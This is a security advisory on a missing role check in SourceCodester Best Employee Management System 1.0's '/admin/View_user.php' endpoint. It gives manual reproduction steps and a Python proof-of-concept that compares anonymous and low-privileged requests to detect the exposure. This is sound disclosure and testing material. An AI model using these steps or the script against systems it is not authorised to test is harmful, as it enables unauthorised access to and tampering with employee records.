SourceCodester Best Employee Management System Access Control Vulnerability in Administrative Endpoint
Vulnerability
A critical access control vulnerability has been identified in SourceCodester Best Employee Management System version 1.0. The issue resides in the administrative endpoint '/admin/View_user.php', which does not verify that the authenticated session belongs to an administrator before serving its functions. As a result, any lower-privileged account can reach the page and use it, without needing local access, to create, view, and delete employee records that only an administrator should be able to manage.
Impact
Exploitation of this vulnerability lets a lower-privileged user invoke administrative functionality without authorization, violating the principle of least privilege. The exposed operations include viewing, creating, and deleting employee records, so the impact covers both confidentiality (disclosure of employee data to staff who should not see it) and integrity (unauthorized creation or deletion of records). Because the flaw is a missing server-side role check rather than a hidden link, hiding the menu entry in the user interface does not mitigate it.
Reproduction
To reproduce this vulnerability, first log into the application as an administrator and note the functions available at '/admin/View_user.php', so that you have a reference for what the page offers. Then log out and log in as a lower-privileged user. Append '/admin/View_user.php' to the base URL and request it directly. The page loads for the low-privileged session instead of redirecting to the login page or returning an authorization error, and the same administrative controls are available, allowing the user to delete or create employee records. Comparing the response with an unauthenticated request to the same URL confirms that authentication is being checked but the user's role is not.
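The following script automates the differential check described above: it requests '/admin/View_user.php' once with no session and once with a low-privileged session, and classifies each response. It is an added example written for this advisory, not code from the advisory or from the SourceCodester project. The login form path ('/login.php'), its field names ('username', 'password'), and the text markers used to recognise an exposed admin page are assumptions, since the advisory does not state them; adjust them to match the target. Run it only against an instance you are authorised to test.

```python
"""Differential check for the missing authorization on /admin/View_user.php.

Added example (not from the advisory or the SourceCodester project). The login
path, login field names and admin-page markers below are assumptions.
"""
import argparse
import urllib.error
import urllib.request
from dataclasses import dataclass
from http.cookiejar import CookieJar
from typing import Optional
from urllib.parse import urlencode, urljoin, urlparse

ADMIN_ENDPOINT = "/admin/View_user.php"      # endpoint named in the advisory
LOGIN_PATH = "/login.php"                    # assumption
LOGIN_FIELDS = ("username", "password")      # assumption
# Assumption: an exposed admin page carries record-management controls.
ADMIN_MARKERS = ("delete", "add employee", "create")


@dataclass
class Observation:
    status: int
    final_url: str   # URL after any redirects were followed
    body: str


def classify(obs: Observation) -> str:
    """Decide what a fetch of the admin endpoint showed.

    'denied'  - explicit 401/403, or bounced to the login page
    'exposed' - admin page served with its management controls
    'unclear' - anything else; inspect the response by hand
    """
    path = urlparse(obs.final_url).path.lower()
    if obs.status in (401, 403):
        return "denied"
    if path.endswith(LOGIN_PATH.lower()):
        return "denied"
    if obs.status == 200 and path.endswith(ADMIN_ENDPOINT.lower()):
        body = obs.body.lower()
        if any(marker in body for marker in ADMIN_MARKERS):
            return "exposed"
    return "unclear"


def new_session() -> urllib.request.OpenerDirector:
    """Opener with its own cookie jar, so each role gets a separate session."""
    return urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(CookieJar()))


def fetch(opener, base_url: str, path: str,
          data: Optional[bytes] = None) -> Observation:
    """GET (or POST when data is given) and keep status, final URL and body."""
    req = urllib.request.Request(urljoin(base_url, path), data=data)
    try:
        with opener.open(req, timeout=15) as resp:
            return Observation(resp.status, resp.geturl(),
                               resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:   # 4xx/5xx still carry a response
        return Observation(err.code, err.geturl(),
                           err.read().decode("utf-8", "replace"))


def login(opener, base_url: str, username: str, password: str) -> None:
    """Submit the (assumed) login form; the session cookie lands in the jar."""
    form = urlencode({LOGIN_FIELDS[0]: username,
                      LOGIN_FIELDS[1]: password}).encode()
    fetch(opener, base_url, LOGIN_PATH, data=form)


def check(base_url: str, username: str, password: str) -> dict:
    """Compare an unauthenticated session with a low-privileged one."""
    anon = new_session()
    results = {"anonymous": classify(fetch(anon, base_url, ADMIN_ENDPOINT))}
    user = new_session()
    login(user, base_url, username, password)
    results["low_privileged"] = classify(fetch(user, base_url, ADMIN_ENDPOINT))
    return results


def verdict(results: dict) -> str:
    """Interpret the pair of classifications from check()."""
    if results["anonymous"] == "exposed":
        return "no authentication at all on the admin endpoint"
    if results["low_privileged"] == "exposed":
        return "authenticated but unauthorized access: role is not checked"
    if results["low_privileged"] == "denied":
        return "role check present (not vulnerable as tested)"
    return "inconclusive; inspect responses manually"


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description=__doc__.splitlines()[0])
    ap.add_argument("base_url", help="e.g. http://target/")
    ap.add_argument("username", help="low-privileged account")
    ap.add_argument("password")
    args = ap.parse_args()
    res = check(args.base_url, args.username, args.password)
    print(res)
    print(verdict(res))
```

The anonymous request is the control: if it is denied while the low-privileged session is served the page with its delete and create controls, the endpoint authenticates but does not authorize, which is exactly the condition the advisory describes. If even the anonymous request is served, the problem is broader than a missing role check.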
